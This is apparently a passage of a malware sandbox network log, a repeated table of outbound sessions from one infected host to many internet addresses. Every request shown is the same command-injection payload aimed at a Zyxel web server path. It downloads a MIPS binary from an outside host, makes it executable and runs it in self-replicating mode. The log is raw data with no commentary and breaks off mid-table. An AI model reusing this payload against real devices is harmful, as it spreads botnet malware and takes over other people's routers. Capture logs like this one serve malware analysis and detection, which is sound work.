                                                Jan 29, 2024 07:07:40.148273945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2268192.168.2.236083876.210.189.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148323059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2269192.168.2.2336778206.157.120.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148341894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2270192.168.2.235359032.46.243.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148400068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2271192.168.2.2357684155.95.139.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148407936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2272192.168.2.2335148190.95.160.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148438931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2273192.168.2.2354606202.167.222.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148458004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2274192.168.2.2348184118.120.91.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148519993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2275192.168.2.235675468.19.47.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148545027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2276192.168.2.2338238199.14.130.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148571014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2277192.168.2.2347838141.58.144.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148622990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2278192.168.2.2345730174.206.238.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148669958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2279192.168.2.2343766204.46.246.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148716927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2280192.168.2.234650886.247.135.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148747921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2281192.168.2.235695434.168.236.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148778915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2282192.168.2.2350320217.216.29.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148812056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2283192.168.2.2340284216.135.141.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148865938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2284192.168.2.234981866.16.164.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148893118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2285192.168.2.2338978123.184.183.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148917913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2286192.168.2.2341684189.67.83.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.148963928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2287192.168.2.2356764150.203.92.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149022102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2288192.168.2.234040827.201.220.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149045944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2289192.168.2.2334974182.68.235.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149095058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2290192.168.2.2360114131.75.201.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149116993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2291192.168.2.2338778121.212.194.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149152040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2292192.168.2.23458461.66.190.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149207115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2293192.168.2.233530272.146.202.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149241924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2294192.168.2.2344294106.122.252.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149305105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2295192.168.2.2333574143.73.74.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149324894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2296192.168.2.235736895.121.240.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149344921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2297192.168.2.2353930196.191.239.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149389029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2298192.168.2.234621825.45.163.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149426937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2299192.168.2.2338296112.121.115.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149473906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2300192.168.2.2349596175.186.147.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149509907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2301192.168.2.234141851.173.211.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149545908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2302192.168.2.233750869.142.249.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149569035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2303192.168.2.236031287.212.101.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149599075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2304192.168.2.233418049.126.100.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149651051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2305192.168.2.233729494.150.174.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149703026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2306192.168.2.235738663.91.219.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149741888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2307192.168.2.2348956114.107.124.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149764061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2308192.168.2.235634025.249.225.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149810076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2309192.168.2.235385664.252.26.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149853945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2310192.168.2.2334354179.36.176.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149899960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2311192.168.2.234751619.14.26.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149930954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2312192.168.2.234835671.109.148.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149985075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2313192.168.2.2345092153.255.120.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.149996996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2314192.168.2.2352934159.130.100.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150074005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2315192.168.2.235570241.210.77.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150095940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2316192.168.2.235381620.217.231.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150125027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2317192.168.2.235027077.187.253.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150167942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2318192.168.2.233346239.253.43.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150217056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2319192.168.2.233526018.217.211.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150247097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2320192.168.2.2349330133.93.110.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150266886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2321192.168.2.2341710201.172.175.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150329113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2322192.168.2.234259013.136.56.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150365114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2323192.168.2.2351168150.158.253.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150403976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2324192.168.2.234360481.51.164.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150429964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2325192.168.2.234604885.134.136.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150497913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2326192.168.2.2360484202.76.72.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150537968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2327192.168.2.234458891.238.117.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150571108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2328192.168.2.2345364212.1.135.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150619984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2329192.168.2.233591678.120.248.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150655031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2330192.168.2.233571661.73.24.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:40.150681019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2331192.168.2.2354442110.101.188.6443
                                                TimestampBytes transferredDirectionData
